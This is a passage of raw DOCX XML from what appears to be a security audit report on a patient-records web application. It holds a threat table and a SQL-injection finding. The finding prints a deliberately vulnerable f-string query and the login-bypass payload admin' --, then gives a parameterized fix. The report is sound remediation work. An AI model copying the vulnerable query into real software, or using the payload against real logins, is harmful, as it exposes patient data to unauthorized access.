              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Baseline Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hardened Defense Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>/api/login &amp; Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Unsalted MD5, SQLi bypass, unauthenticated Base64 cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>PBKDF2-HMAC-SHA256 (600k rounds), Parameterized queries, Cryptographic HMAC session tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Local Storage &amp; Payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Pickle deserialization, SQL concatenation, file overwrites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>HMAC-SHA256 signed JSON payloads, Parameterized queries, Strict path traversal sanitization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Audit Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Missing audit trails, log injection, unredacted plaintext PHI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Structured JSON audit logging with automatic SSN/Credit Card masking and UUID tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Database At Rest &amp; Errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Plaintext SSN/Credit Cards in SQLite, debug stack traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Field-level AES-128-CBC + HMAC-SHA256 (Fernet), Sanitized generic JSON error handlers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Authentication Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Unlimited brute-force credential stuffing attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Exponential delay, automated 5-failure lockout (5 min duration), client rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>/api/records/&lt;id&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Insecure Direct Object Reference (IDOR) with zero auth checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role-Based Access Control (RBAC) decorators and strict object-level patient ownership checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>4. Vulnerability Identification, Analysis &amp; Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The security audit identified 10 major vulnerability categories across the baseline application. Each flaw is detailed below with industry standard classifications (CWE, OWASP Top 10, CVSS v3.1 base score), the vulnerable implementation, real-world exploit scenario, secure remediated implementation, and security rationale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-01: SQL Injection in Authentication &amp; Patient Records Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A03:2021 – Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>9.8 (Critical) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]</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B608:hardcoded_sql_expressions</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vulnerable_app/database.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def query_user_vulnerable(username: str, password_raw: str):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    conn = get_db_connection()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    cursor = conn.cursor()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    pwd_hash = hash_password(password_raw)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Direct string interpolation - CRITICAL SQL INJECTION</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    sql = f"SELECT * FROM users WHERE username = '{username}' AND password = '{pwd_hash}'"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    cursor.execute(sql)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return cursor.fetchone()</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 unauthenticated attacker inputs username: admin' -- with any arbitrary password. The SQLite engine evaluates: SELECT * FROM users WHERE username = 'admin' --' AND password = '...', treating everything after '--' as a comment. The attacker logs in as the administrator without knowing the password. In search endpoints, UNION SELECT payloads allow full exfiltration of user credentials.</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secure_app/database.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def get_user_by_username(username: str) -&gt; Optional[sqlite3.Row]:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    conn = get_db_connection()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    cursor = conn.cursor()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Strictly parameterized query using SQLite ? placeholder</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    cursor.execute(</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        "SELECT id, username, password_hash, role, email, failed_attempts, locked_until "</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        "FROM users WHERE username = ?",</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        (username,)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    )</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return cursor.fetchone()</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Parameterized queries separate SQL syntax parsing from runtime data values. The database engine treats user inputs purely as literal data strings, preventing any injected characters from altering query structure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-02: Use of Obsolete Cryptographic Hash for Password Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-328: Use of Weak Hash &amp; CWE-916: Use of Password Hash With Insufficient Computational Effort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A02:2021 – Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
